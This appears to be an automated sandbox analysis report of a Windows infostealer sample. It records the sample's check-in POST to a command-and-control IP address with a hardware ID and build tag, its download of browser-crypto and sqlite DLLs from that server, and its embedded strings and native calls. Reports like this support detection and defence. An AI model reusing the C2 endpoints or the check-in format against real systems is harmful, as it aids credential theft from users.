Source: unknown HTTP traffic detected: POST /300e6d86f44da037.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDBHost: 89.105.198.253Content-Length: 223Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 43 32 41 39 38 41 42 31 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 65 6f 77 73 74 65 72 69 6f 6c 61 6e 64 31 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 2d 2d 0d 0a Data Ascii: ------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="hwid"84C2A98AB19D1524750037------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="build"meowsterioland16------KJJJKFIIIJJJECAAEHDB--
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000092E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://89.105.198.253
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp, Vk2yYa9dHl.exe, 00000000.00000002.1753586835.0000000000099000.00000004.00000001.01000000.00000003.sdmp, Vk2yYa9dHl.exe, 00000000.00000002.1754008719.0000000000974000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://89.105.198.253/300e6d86f44da037.php
Source: Vk2yYa9dHl.exe, 00000000.00000002.1753586835.0000000000099000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://89.105.198.253/300e6d86f44da037.php0//EN
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.0000000000974000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://89.105.198.253/300e6d86f44da037.php9
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://89.105.198.253/300e6d86f44da037.phpCoinomi
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.0000000000974000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://89.105.198.253/a50c1b38c13f8f79/freebl3.dll
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.0000000000974000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://89.105.198.253/a50c1b38c13f8f79/freebl3.dllSV
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.0000000000974000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://89.105.198.253/a50c1b38c13f8f79/mozglue.dll
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.0000000000974000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://89.105.198.253/a50c1b38c13f8f79/msvcp140.dll
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.0000000000974000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://89.105.198.253/a50c1b38c13f8f79/msvcp140.dll%Vv
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000092E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://89.105.198.253/a50c1b38c13f8f79/nss3.dll
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000092E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://89.105.198.253/a50c1b38c13f8f79/nss3.dll-gD
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.0000000000974000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://89.105.198.253/a50c1b38c13f8f79/softokn3.dll
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.0000000000974000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://89.105.198.253/a50c1b38c13f8f79/sqlite3.dll
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.0000000000974000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://89.105.198.253/a50c1b38c13f8f79/sqlite3.dll)Yr?
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.0000000000974000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://89.105.198.253/a50c1b38c13f8f79/vcruntime140.dll
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: Vk2yYa9dHl.exe, Vk2yYa9dHl.exe, 00000000.00000002.1771981611.000000006CD3D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: Vk2yYa9dHl.exe, 00000000.00000002.1771847830.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, Vk2yYa9dHl.exe, 00000000.00000002.1764794724.000000001ACE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: GIJKKKFC.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: GIJKKKFC.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ep
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.epnacl
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp, GIJKKKFC.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp, GIJKKKFC.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: GIJKKKFC.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: GIJKKKFC.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: GIJKKKFC.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: FBGCAAAAFBKEBFHJEGCFCAAKEH.0.dr String found in binary or memory: https://support.mozilla.org
Source: FBGCAAAAFBKEBFHJEGCFCAAKEH.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: FBGCAAAAFBKEBFHJEGCFCAAKEH.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: Vk2yYa9dHl.exe, 00000000.00000003.1688064833.0000000020C6D000.00000004.00000020.00020000.00000000.sdmp, Vk2yYa9dHl.exe, 00000000.00000002.1753586835.0000000000198000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Vk2yYa9dHl.exe, 00000000.00000002.1753586835.0000000000198000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: Vk2yYa9dHl.exe, 00000000.00000003.1688064833.0000000020C6D000.00000004.00000020.00020000.00000000.sdmp, Vk2yYa9dHl.exe, 00000000.00000002.1753586835.0000000000198000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Vk2yYa9dHl.exe, 00000000.00000002.1753586835.0000000000198000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp, GIJKKKFC.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: GIJKKKFC.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: FBGCAAAAFBKEBFHJEGCFCAAKEH.0.dr String found in binary or memory: https://www.mozilla.org
Source: FBGCAAAAFBKEBFHJEGCFCAAKEH.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: FBGCAAAAFBKEBFHJEGCFCAAKEH.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Vk2yYa9dHl.exe, 00000000.00000003.1742804323.0000000026FC0000.00000004.00000020.00020000.00000000.sdmp, FBGCAAAAFBKEBFHJEGCFCAAKEH.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: FBGCAAAAFBKEBFHJEGCFCAAKEH.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Vk2yYa9dHl.exe, 00000000.00000002.1753586835.0000000000099000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: Vk2yYa9dHl.exe, 00000000.00000003.1742804323.0000000026FC0000.00000004.00000020.00020000.00000000.sdmp, FBGCAAAAFBKEBFHJEGCFCAAKEH.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary
barindex
PE file has a writeable .text section
Source: Vk2yYa9dHl.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCEED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 0_2_6CCEED10
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD2B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CD2B700
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD2B8C0 rand_s,NtQueryVirtualMemory, 0_2_6CD2B8C0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD2B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6CD2B910
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCCF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CCCF280
Detected potential crypto function
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_0028B446 0_2_0028B446
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCC35A0 0_2_6CCC35A0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCD64C0 0_2_6CCD64C0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCED4D0 0_2_6CCED4D0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD06CF0 0_2_6CD06CF0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCCD4E0 0_2_6CCCD4E0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCD6C80 0_2_6CCD6C80
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD234A0 0_2_6CD234A0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD2C4A0 0_2_6CD2C4A0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCD5440 0_2_6CCD5440
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD3545C 0_2_6CD3545C
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD05C10 0_2_6CD05C10
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD12C10 0_2_6CD12C10
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD3AC00 0_2_6CD3AC00
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD3542B 0_2_6CD3542B
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD00DD0 0_2_6CD00DD0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD285F0 0_2_6CD285F0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCDFD00 0_2_6CCDFD00
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCF0512 0_2_6CCF0512
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCEED10 0_2_6CCEED10
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD376E3 0_2_6CD376E3
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCCBEF0 0_2_6CCCBEF0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCDFEF0 0_2_6CCDFEF0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD2E680 0_2_6CD2E680
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCE5E90 0_2_6CCE5E90
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD24EA0 0_2_6CD24EA0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD03E50 0_2_6CD03E50
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCE4640 0_2_6CCE4640
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCE9E50 0_2_6CCE9E50
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD12E4E 0_2_6CD12E4E
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD36E63 0_2_6CD36E63
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCCC670 0_2_6CCCC670
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD07E10 0_2_6CD07E10
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD15600 0_2_6CD15600
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD29E30 0_2_6CD29E30
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCCDFE0 0_2_6CCCDFE0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCF6FF0 0_2_6CCF6FF0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD177A0 0_2_6CD177A0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD07710 0_2_6CD07710
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCD9F00 0_2_6CCD9F00
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD350C7 0_2_6CD350C7
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCEC0E0 0_2_6CCEC0E0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD058E0 0_2_6CD058E0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCF60A0 0_2_6CCF60A0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCE8850 0_2_6CCE8850
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCED850 0_2_6CCED850
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD0F070 0_2_6CD0F070
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCD7810 0_2_6CCD7810
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD0B820 0_2_6CD0B820
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD14820 0_2_6CD14820
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD05190 0_2_6CD05190
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD22990 0_2_6CD22990
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCCC9A0 0_2_6CCCC9A0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCFD9B0 0_2_6CCFD9B0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCEA940 0_2_6CCEA940
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD1B970 0_2_6CD1B970
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD3B170 0_2_6CD3B170
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCDD960 0_2_6CCDD960
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD08AC0 0_2_6CD08AC0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD0E2F0 0_2_6CD0E2F0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCE1AF0 0_2_6CCE1AF0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD3BA90 0_2_6CD3BA90
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD32AB0 0_2_6CD32AB0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCC22A0 0_2_6CCC22A0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCF4AA0 0_2_6CCF4AA0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCDCAB0 0_2_6CCDCAB0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD09A60 0_2_6CD09A60
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD353C8 0_2_6CD353C8
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCCF380 0_2_6CCCF380
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCC5340 0_2_6CCC5340
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCDC370 0_2_6CCDC370
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD0D320 0_2_6CD0D320
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CDCECD0 0_2_6CDCECD0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD6ECC0 0_2_6CD6ECC0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD7AC60 0_2_6CD7AC60
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CE4AC30 0_2_6CE4AC30
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CE36C00 0_2_6CE36C00
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CEFCDC0 0_2_6CEFCDC0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD74DB0 0_2_6CD74DB0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CE06D90 0_2_6CE06D90
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CE3ED70 0_2_6CE3ED70
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CE9AD50 0_2_6CE9AD50
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CEF8D20 0_2_6CEF8D20
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD7AEC0 0_2_6CD7AEC0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CE10EC0 0_2_6CE10EC0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CDF6E90 0_2_6CDF6E90
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CE0EE70 0_2_6CE0EE70
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: String function: 6CEF09D0 appears 37 times
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: String function: 6CCFCBE8 appears 134 times
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: String function: 000543B0 appears 316 times
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: String function: 6CD094D0 appears 90 times
Sample file is different than original file name gathered from version info
Source: Vk2yYa9dHl.exe, 00000000.00000002.1772025906.000000006CD52000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs Vk2yYa9dHl.exe
Source: Vk2yYa9dHl.exe, 00000000.00000002.1772337064.000000006CF45000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs Vk2yYa9dHl.exe
Uses 32bit PE files
Source: Vk2yYa9dHl.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/20@0/1
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CD27030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6CD27030
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_00064DE0 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 0_2_00064DE0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
